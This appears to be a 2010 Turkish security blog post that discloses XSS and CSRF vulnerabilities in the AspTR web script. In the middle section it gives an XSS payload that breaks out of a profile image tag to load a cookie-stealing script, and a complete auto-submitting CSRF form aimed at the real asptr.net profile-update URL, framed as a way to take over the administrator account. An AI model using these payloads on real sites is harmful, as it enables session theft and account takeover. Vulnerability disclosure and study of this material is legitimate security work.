Bilgi Güvenliği Rehberi
Kullanıcı girişi
Gezinti
En son ağ günlüğü gönderileri
- Firefox 3.5 : Dünyanın en popüler web tarayıcısı
- NoSQL ve cloud veritabanlarının geleceği
- McAfee'den yeni bir rapor: Mapping the Mal Web
- Banka Internet şubelerinde tek kullanımlık şifre zorunlu hale geliyor!
- Apple güvenlik güncellemeleri
- Google'dan DNS hizmeti
- Sevgililer Günü için çıkacak virüslere dikkat
- Firefox 3.0.6 çıktı
- UYDUNET Kullanıcıları Paylaştığınız Dosyalara Dikkat Edin !!!
- iWork09 virüsünü bulma ve silme
AspTR All version CSRF ve XSS ( Kritik Seviyede )
June 16, 2010 yazan FreWaL
Türkçe bir script olarak hazırlanan asptr.net e ait scripte CSRF ve XSS güvenlik açığına rastladım . Güvenlik açığı http://www.exploit-db.com/exploits/13891/ sitesinde yayınlandı. Bir kaç güvenlik firmasına daha gönderdim umarım masterleri açığı yamalamada daha hızlı davranır.
ilk önce XSS den bahsetmek istiyorum . Betik normal üyelerin profillerindeki resim yolundan kaynaklanıyor.
değişkenlere az biraz baktığımızda dilediğimizi yazabildiğimizi görebiliyoruz ve resimde de hiç bir filtrelemenin olmadığını görüyoruz .
örnek = <img src="sitedebelirtilenresimyolu.jpg"/>
Peki az biraz düşünüyoruz bu adamlar profilde hiç bir filtreleme yoluna gitmemiş o zaman düşünüyoruz adam foto seçimi eklemiş ve bunun betiğimizi <img src="sitedebelirtilenresimyolu.jpg"/> gibi bir tag aralığında yayınlanmasını sağlamış + olarak adam bana hiç bir kısıtlama getirmemiş o zaman ben profilimdeki resim kodumu "/> şeklinde kapatarak yeni taga geçiş yapıyorum ve update ediyorum.
siteresmi.jpg"/><script src="cookie.js"/> bundan sonrası ise oyuncak zaten foruma basit bir konu açarak adminin konuya girmesini sağlamam onu hacklemem için yeterli bi neden olacaktır.
ikinci bir güvenlik açığı ise CSRF profil updatede hiç bir filtreleme yok o zaman aşağıdaki betiğe yöneticiyi tıklatmak yeni adminin bizim olmamızı sağlayacak kadar yeterli bir nedendir .
<frewal>
Target site :<form method="POST" action="http://www.asptr.net/Uye.asp?Uye=Kaydet">
<p>Password : <input type="text" name="sifre" size="49" value="sifre"></p>
<p>E-Mail : <input type="text" name="mail" size="49" value="mail"></p>
<p>Secret question : <input type="text" name="soru" size="49" value="soru"></p>
<p><span id="result_box" class="short_text"><span style title>Reply
: </span></span><input type="text" name="cevap" size="49" value="cevap"></p>
<p>Name : <input type="text" name="ad" size="49" value="ad"></p>
<p>Last Name : <input type="text" name="soyad" size="49" value="soyad"></p>
<p>Dont Changing : <select size="1" name="sehir" id="sehir">
<option value="Adana">Adana</option></p>
<p>Profession :<input type="text" name="meslek" size="49" value="meslek"></p>
<p>Msn :<input type="text" name="msn" size="49" value="msn"></p>
<p>Web :<input type="text" name="web" size="49" value="web"></p>
<p>
Sex
:<select name="cinsiyet" size="1">
<option>Bay</option>
<option>Bay</option>
<option>Bayan</option>
</select>
</p>
<p>Avatar :<input type="text" name="icon" size="49" value="icon"></p>
<p> </p>
<p> </p>
<script> document.forms[0].submit() </script>
</form>
</frewal>
Scripti kulanan bi sürü site var .Umarım güvenlik açığı yayılmadan masterleri kapatma yoluna gider.
- Yorum göndermek için giriş yapın veya kayıt olun
Ara
Kimler yeni
Sophos - En Son Çıkan Virüsler
İçerik paylaşımı
Son yorumlar
3 hafta 4 gün önce
4 hafta 2 gün önce
7 hafta 3 gün önce
8 hafta 20 saat önce
8 hafta 3 gün önce
27 hafta 1 gün önce
32 hafta 6 gün önce
34 hafta 1 gün önce
36 hafta 4 gün önce
36 hafta 4 gün önce